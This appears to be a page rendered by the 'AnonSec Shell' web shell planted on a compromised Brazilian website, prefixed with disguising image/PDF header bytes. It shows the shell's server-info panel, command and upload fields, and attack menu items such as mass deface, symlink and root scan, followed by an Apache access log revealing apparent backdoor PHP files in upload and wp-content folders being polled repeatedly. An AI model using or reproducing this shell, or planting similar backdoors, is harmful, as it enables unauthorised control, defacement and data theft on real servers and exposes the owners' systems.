ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/access-logs/admin.evidenciarevista.com.br
66.249.70.1 - - [17/Sep/2025:23:42:39 -0300] "GET /q-~118gs1vRIr02QH4lMwWXX4MOxkhIcLr6x13435/ HTTP/1.1" 200 10815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.8 - - [17/Sep/2025:23:44:11 -0300] "GET /q-~198bZ7IJ1ek15q1628vdBpaNAoKtLxKHC14145/ HTTP/1.1" 200 12139 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.2 - - [17/Sep/2025:23:44:12 -0300] "GET /q-~12Cog0MIElEYc0CuFUeuqyh747L3hlCZ42977/ HTTP/1.1" 200 11234 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.129 - - [17/Sep/2025:23:44:14 -0300] "GET /robots.txt HTTP/1.1" 200 142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [17/Sep/2025:23:44:14 -0300] "GET /uploads/users/avatar/abf3cfa73cc359ec7ab677af77675857.php HTTP/1.1" 200 5350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.2 - - [17/Sep/2025:23:45:43 -0300] "GET /q-~161xvG3wwqu8dmCCzlSZRs5a3TrAKfmkG39598/ HTTP/1.1" 200 10379 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.208.18 - - [17/Sep/2025:23:47:39 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25"
204.12.208.18 - - [17/Sep/2025:23:47:19 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.197.149.50 - - [17/Sep/2025:23:48:48 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [17/Sep/2025:23:50:20 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [17/Sep/2025:23:51:48 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.23.227.62 - - [17/Sep/2025:23:57:58 -0300] "GET /uploads/post/f05d8b0b40601fa0c3a782e378ade05d.jpg HTTP/1.1" 206 61012 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:57:59 -0300] "GET /uploads/users/avatar/08464df838e7c6a7f67729fcddbec337.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:05 -0300] "GET /uploads/users/avatar/9105426380d39e7f8824e950c2ff60d1.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:07 -0300] "GET /uploads/users/avatar/13c33c38124c1d951d188ff2e6866fed.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:16 -0300] "GET /uploads/parceiros/816e2719412ea51f6275316b109b04a5.jpg HTTP/1.1" 206 32380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:29 -0300] "GET /uploads/users/avatar/fd9c4b10af51486b4dce5b9b3863fd71.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:46 -0300] "GET /uploads/users/avatar/27757d345076dc6329aabae50e6f8309.jpg HTTP/1.1" 404 16620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:47 -0300] "GET /uploads/users/avatar/d53f23b95a05098d84d4919c750dd507.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.249.70.2 - - [17/Sep/2025:23:58:47 -0300] "GET /q-~30SaklTnGLHTb7uIccTTTYopcJb7SrDv16087/ HTTP/1.1" 200 12005 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.23.227.62 - - [17/Sep/2025:23:58:55 -0300] "GET /uploads/users/avatar/e7586ef7161bf27365036786a864e9ba.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:58:56 -0300] "GET /uploads/users/avatar/4ec973019967602514085e5017302dbd.jpeg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:00 -0300] "GET /uploads/users/avatar/5def1921644e373b0dd7343baaf54d5e.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:01 -0300] "GET /uploads/users/avatar/188ce5ab3d10c478abc6f6e3d7451ba1.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:14 -0300] "GET /uploads/users/avatar/80baf15e226766ac8ddb818856549729.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:18 -0300] "GET /uploads/users/avatar/bf2d5b2452d82bfea8ae2954f4a50abe.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:19 -0300] "GET /uploads/post/4edfc7f9f466dbcff6773f18776188e1.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:22 -0300] "GET /uploads/parceiros/c483df19d545fd2f75c858c46877c391.jpg HTTP/1.1" 206 35168 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:23 -0300] "GET /uploads/users/avatar/6855e021cb4d953e2e35e66ffeee49ce.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:25 -0300] "GET /uploads/users/avatar/3c52da46accfbb38b96db555a23593b4.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:26 -0300] "GET /uploads/parceiros/2ccf5d331b55420d9704c4f9733d8e08.jpg HTTP/1.1" 206 29901 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:27 -0300] "GET /uploads/users/avatar/070214a4bf71bb21a4add3af85d8eddf.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:33 -0300] "GET /uploads/users/avatar/2865aac029196c1ec603940410a3d1bf.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.249.70.2 - - [17/Sep/2025:23:59:34 -0300] "GET /q-~52yILvyhYwpU5DEX6CfrpNc6pmzmV50L19097/ HTTP/1.1" 200 11065 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.23.227.62 - - [17/Sep/2025:23:59:38 -0300] "GET /uploads/users/avatar/7664313430334c895993373a68647ef8.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:39 -0300] "GET /uploads/users/avatar/89ce452c937e185d87955446d90fd151.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:44 -0300] "GET /uploads/users/avatar/bf24cbef2b8027c5b433f45fb797457b.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:55 -0300] "GET /uploads/users/avatar/88f7d7a58cc21831adec8281c31ea926.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [17/Sep/2025:23:59:58 -0300] "GET /uploads/parceiros/53207205d72c814a2b046d07bdc0d8c9.jpg HTTP/1.1" 206 23429 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:00 -0300] "GET /uploads/users/avatar/863beb5398cc20dca92adbae746d6f61.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:06 -0300] "GET /uploads/users/avatar/f0ffecaae5ffa698dbe426ecd53d0760.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:18 -0300] "GET /uploads/users/avatar/3917623b21254aad50c19f774d20dbf7.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:19 -0300] "GET /uploads/parceiros/1cc0aa0756f4336db915600b320c7be1.jpg HTTP/1.1" 206 61642 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:19 -0300] "GET /uploads/users/avatar/3917623b21254aad50c19f774d20dbf7.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:21 -0300] "GET /uploads/parceiros/1cc0aa0756f4336db915600b320c7be1.jpg HTTP/1.1" 206 61642 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:23 -0300] "GET /uploads/users/avatar/5c70dc6b44c6f1ff2a9e3eb25eb1cb4c.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:24 -0300] "GET /uploads/users/avatar/5c70dc6b44c6f1ff2a9e3eb25eb1cb4c.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.23.227.62 - - [18/Sep/2025:00:00:37 -0300] "GET /uploads/users/avatar/5c70dc6b44c6f1ff2a9e3eb25eb1cb4c.jpg HTTP/1.1" 206 65535 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
204.12.208.18 - - [18/Sep/2025:00:01:41 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1"
204.12.208.18 - - [18/Sep/2025:00:01:21 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Iron/11.0.700.2 Chrome/11.0.700.2 Safari/534.24"
69.197.149.50 - - [18/Sep/2025:00:02:49 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:04:19 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:06:37 -0300] "GET /q-~73cWVCInn2sqrCdaSIBIzyAoaA8lzmef2696/ HTTP/1.1" 200 11851 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:06:03 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:07:35 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:09:45 -0300] "GET /q-~190DBqeUHj4t6WA40RIu0Yff77WcGdUmu40839/ HTTP/1.1" 200 12835 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:09:03 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:10:36 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:12:41 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:15:16 -0300] "GET /q-~161T1sZQ9N2dtGisnWPfa1MBLColk83NB13362/ HTTP/1.1" 200 10408 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:15:36 -0300] "GET /q-~142htwmsMUt3OzcztsmHYwWs3NFPR0RuC40285/ HTTP/1.1" 200 11628 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:14:12 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:00:15:55 -0300] "GET /q-~142Glg9mvv4VDzjAireXFLewcgcssfh3w40387/ HTTP/1.1" 200 10998 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.2 - - [18/Sep/2025:00:16:15 -0300] "GET /q-~140FVgxOqsdXB36ePOF3Qf8TXwh7l48qB27759/ HTTP/1.1" 200 12276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:16:54 -0300] "GET /q-~96C8mWqzWt7AhGwaakDyFEttCcF3tVnj15827/ HTTP/1.1" 200 12250 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:15:46 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.2 - - [18/Sep/2025:00:17:14 -0300] "GET /q-~73dVJMkYCeQ1L8VzzJUlT8gRGVjVXhSQ2688/ HTTP/1.1" 200 11411 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:17:31 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:00:17:35 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 26 "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Iron/11.0.700.2 Chrome/11.0.700.2 Safari/534.24"
66.249.70.8 - - [18/Sep/2025:00:17:55 -0300] "GET /q-~106ybQJr9doj5ZtEa8Fw0W6mJRoNTNhUp28923/ HTTP/1.1" 200 11896 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:18:37 -0300] "GET /q-~106pzv3MZYusqUCW5k4L0dznZDVDlNZOB28925/ HTTP/1.1" 200 10988 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.12.208.18 - - [18/Sep/2025:00:17:15 -0300] "GET /wp-content/imec50e5/index.php HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
66.249.70.8 - - [18/Sep/2025:00:18:56 -0300] "GET /q-~106TxC7FWhMVvtDdu2To6oJQTERmQxkGk28931/ HTTP/1.1" 200 11668 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.109.179 - - [18/Sep/2025:00:19:06 -0300] "GET /uploads/post/65486f404b84000df7bcae9ff4698c7d.jpg HTTP/1.1" 200 47572 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.70.2 - - [18/Sep/2025:00:19:16 -0300] "GET /q-~123z5Zse58ElyTMDjwgoAAYpaVsUfO68a43630/ HTTP/1.1" 200 12456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.1 - - [18/Sep/2025:00:20:14 -0300] "GET /q-~106BYvwLMzN1QGlK7Fg6DBwCsC8awp09z28927/ HTTP/1.1" 200 11204 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:18:49 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.1 - - [18/Sep/2025:00:20:36 -0300] "GET /q-~106znLAGpK5Uk4ZtVY1EnzIze2nOgd2AT28929/ HTTP/1.1" 200 11134 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:20:56 -0300] "GET /q-~128ejtNKssC5OOKfq0gmkqgvt4mgw6YRz38525/ HTTP/1.1" 200 11538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.8 - - [18/Sep/2025:00:21:16 -0300] "GET /q-~50jblYvmCyMlGbk0hnD4A5mqWBLKms1M23149/ HTTP/1.1" 200 11757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:20:20 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
